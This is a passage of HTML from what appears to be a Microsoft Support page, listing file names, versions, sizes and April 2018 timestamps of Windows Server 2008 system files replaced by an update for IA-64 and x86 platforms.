Additionally, the dates and times may change when you perform certain operations on the files.</span><br/><br/><strong>Windows Server 2008 file information</strong></p><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"alert-title\">Notes</div><div class=\"row\"><div class=\"col-xs-24\"><p>The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.</p></div></div></div></div><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">For all supported ia64-based versions</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td><td><strong class=\"sbody-strong\">Service branch</strong></td></tr><tr><td>Hal.dll</td><td>6.0.6002.24367</td><td>428,224</td><td>28-Apr-2018</td><td>02:42</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>373,760</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>255,488</td><td>28-Apr-2018</td><td>02:27</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,536</td><td>28-Apr-2018</td><td>04:33</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>352,768</td><td>28-Apr-2018</td><td>04:24</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>349,696</td><td>28-Apr-2018</td><td>04:11</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>346,624</td><td>28-Apr-2018</td><td>04:17</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>338,944</td><td>28-Apr-2018</td><td>04:30</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll</td><td>6.0.6002.24367</td><td>1,980,416</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Setbcdlocale.dll</td><td>6.0.6002.24367</td><td>143,360</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Winload.efi</td><td>6.0.6002.24367</td><td>1,980,096</td><td>28-Apr-2018</td><td>02:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>27,136</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>02:25</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:30</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>25,600</td><td>28-Apr-2018</td><td>04:20</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>25,600</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>25,088</td><td>28-Apr-2018</td><td>04:15</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>25,088</td><td>28-Apr-2018</td><td>04:28</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi</td><td>6.0.6002.24367</td><td>1,980,096</td><td>28-Apr-2018</td><td>02:42</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>9,728</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>9,216</td><td>28-Apr-2018</td><td>02:26</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>9,728</td><td>28-Apr-2018</td><td>04:31</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>7,680</td><td>28-Apr-2018</td><td>04:23</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll</td><td>6.0.6002.24259</td><td>215,784</td><td>15-Dec-2017</td><td>14:06</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Driver.stl</td><td>Not applicable</td><td>4,349</td><td>15-Dec-2017</td><td>14:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll</td><td>6.0.6002.24367</td><td>4,194,304</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>IA64_MICROSOFT-WINDOWS-COM-BASE-QFE</td></tr><tr><td>Rpcss.dll</td><td>6.0.6002.24367</td><td>1,220,096</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>IA64_MICROSOFT-WINDOWS-COM-BASE-QFE</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>23,040</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>02:24</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>02:26</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:29</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>24,064</td><td>28-Apr-2018</td><td>04:31</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:20</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>13,824</td><td>28-Apr-2018</td><td>04:21</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>12,800</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:14</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>9,728</td><td>28-Apr-2018</td><td>04:16</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:27</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>9,728</td><td>28-Apr-2018</td><td>04:29</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Comcat.dll</td><td>6.0.6002.24367</td><td>13,312</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Oleres.dll</td><td>6.0.6002.24367</td><td>23,552</td><td>28-Apr-2018</td><td>02:00</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Csrsrv.dll</td><td>6.0.6002.24367</td><td>150,016</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Kernel32.dll</td><td>6.0.6002.24367</td><td>2,193,920</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>Not 
applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>250,880</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>23,552</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>160,256</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>71,680</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>224,256</td><td>28-Apr-2018</td><td>02:24</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>02:26</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>146,432</td><td>28-Apr-2018</td><td>02:27</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>58,880</td><td>28-Apr-2018</td><td>02:22</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>281,600</td><td>28-Apr-2018</td><td>04:29</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>23,040</td><td>28-Apr-2018</td><td>04:32</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>181,248</td><td>28-Apr-2018</td><td>04:32</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>67,584</td><td>28-Apr-2018</td><td>04:26</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>158,720</td><td>28-Apr-2018</td><td>04:23</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>16,384</td><td>28-Apr-2018</td><td>04:24</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>110,080</td><td>28-Apr-2018</td><td>04:24</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>42,496</td><td>28-Apr-2018</td><td>04:22</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>143,360</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>15,360</td><td>28-Apr-2018</td><td>04:10</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>101,376</td><td>28-Apr-2018</td><td>04:10</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>41,984</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>121,344</td><td>28-Apr-2018</td><td>04:14</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>13,312</td><td>28-Apr-2018</td><td>04:16</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>87,040</td><td>28-Apr-2018</td><td>04:17</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>04:12</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>126,976</td><td>28-Apr-2018</td><td>04:27</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>13,312</td><td>28-Apr-2018</td><td>04:29</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>89,600</td><td>28-Apr-2018</td><td>04:30</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>35,840</td><td>28-Apr-2018</td><td>04:26</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll</td><td>6.0.6002.24367</td><td>620,544</td><td>28-Apr-2018</td><td>01:51</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Auditpol.exe</td><td>6.0.6002.24367</td><td>121,856</td><td>28-Apr-2018</td><td>01:57</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Msaudite.dll</td><td>6.0.6002.24367</td><td>146,432</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Msobjs.dll</td><td>6.0.6002.24367</td><td>58,880</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Ntdll.dll</td><td>6.0.6002.24367</td><td>2,552,496</td><td>28-Apr-2018</td><td>02:32</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Oleaut32.dll</td><td>6.0.6002.24367</td><td>2,025,984</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Ntoskrnl.exe</td><td>6.0.6002.24367</td><td>9,427,648</td><td>28-Apr-2018</td><td>02:42</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Rpcrt4.dll</td><td>6.0.6002.24367</td><td>3,289,088</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Spsys.sys</td><td>6.0.6002.24298</td><td>702,464</td><td>23-Feb-2018</td><td>03:26</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Smss.exe</td><td>6.0.6002.24367</td><td>159,744</td><td>28-Apr-2018</td><td>01:52</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Ia32exec.bin</td><td>6.5.6524.0</td><td>8,262,048</td><td>21-Nov-2017</td><td>04:34</td><td>Not 
applicable</td><td>IA64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Ntvdm64.dll</td><td>6.0.6002.24367</td><td>27,648</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>IA64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Wow64.dll</td><td>6.0.6002.24367</td><td>523,776</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>IA64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Wow64cpu.dll</td><td>6.0.6002.24367</td><td>43,008</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>IA64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Wow64win.dll</td><td>6.0.6002.24367</td><td>620,544</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>IA64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Wowia32x.dll</td><td>6.5.6563.0</td><td>88,576</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>IA64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Comcat.dll</td><td>6.0.6002.24367</td><td>7,168</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Oleres.dll</td><td>6.0.6002.24367</td><td>23,552</td><td>28-Apr-2018</td><td>01:44</td><td>x86</td><td>Not applicable</td></tr><tr><td>Kernel32.dll</td><td>6.0.6002.24367</td><td>862,720</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Ntdll.dll</td><td>6.0.6002.24367</td><td>1,168,840</td><td>28-Apr-2018</td><td>02:43</td><td>x86</td><td>Not applicable</td></tr><tr><td>Oleaut32.dll</td><td>6.0.6002.24367</td><td>574,464</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Rpcrt4.dll</td><td>6.0.6002.24367</td><td>679,424</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not 
applicable</td></tr><tr><td>Acwow64.dll</td><td>6.0.6002.24367</td><td>43,520</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Instnm.exe</td><td>6.0.6002.24367</td><td>7,680</td><td>28-Apr-2018</td><td>01:41</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Ntvdm64.dll</td><td>6.0.6002.24367</td><td>14,336</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Setup16.exe</td><td>3.1.0.1918</td><td>26,112</td><td>28-Apr-2018</td><td>01:41</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>User.exe</td><td>6.0.6002.24367</td><td>2,560</td><td>28-Apr-2018</td><td>01:41</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Wow32.dll</td><td>6.0.6002.24367</td><td>5,120</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>266,240</td><td>28-Apr-2018</td><td>02:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>360,448</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>360,448</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>356,352</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>348,160</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Advapi32.dll</td><td>6.0.6002.24367</td><td>823,808</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Ole32.dll</td><td>6.0.6002.24367</td><td>1,321,472</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>X86_MICROSOFT-WINDOWS-COM-BASE-QFE</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>02:36</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>02:37</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>262,144</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>167,936</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>233,472</td><td>28-Apr-2018</td><td>02:40</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>02:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>155,648</td><td>28-Apr-2018</td><td>02:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>69,632</td><td>28-Apr-2018</td><td>02:39</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>290,816</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>192,512</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>167,936</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>118,784</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>53,248</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>151,552</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>110,592</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>53,248</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>131,072</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>98,304</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>40,960</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>135,168</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>98,304</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>45,056</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll</td><td>6.0.6002.24367</td><td>620,544</td><td>28-Apr-2018</td><td>01:40</td><td>x86</td><td>Not applicable</td></tr><tr><td>Auditpol.exe</td><td>6.0.6002.24367</td><td>41,984</td><td>28-Apr-2018</td><td>01:43</td><td>x86</td><td>Not applicable</td></tr><tr><td>Msaudite.dll</td><td>6.0.6002.24367</td><td>146,432</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Msobjs.dll</td><td>6.0.6002.24367</td><td>58,880</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr></tbody></table></td></tr></tbody></table><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">For all supported x86-based versions</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td><td><strong class=\"sbody-strong\">Service 
branch</strong></td></tr><tr><td>Halacpi.dll</td><td>6.0.6002.24367</td><td>138,944</td><td>28-Apr-2018</td><td>02:58</td><td>x86</td><td>Not applicable</td></tr><tr><td>Halmacpi.dll</td><td>6.0.6002.24367</td><td>170,176</td><td>28-Apr-2018</td><td>02:58</td><td>x86</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>380,928</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>389,120</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>401,408</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>266,240</td><td>28-Apr-2018</td><td>02:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not 